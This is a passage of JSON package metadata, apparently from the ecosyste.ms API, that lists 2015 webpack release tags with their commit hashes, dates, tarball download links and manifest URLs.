odeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url"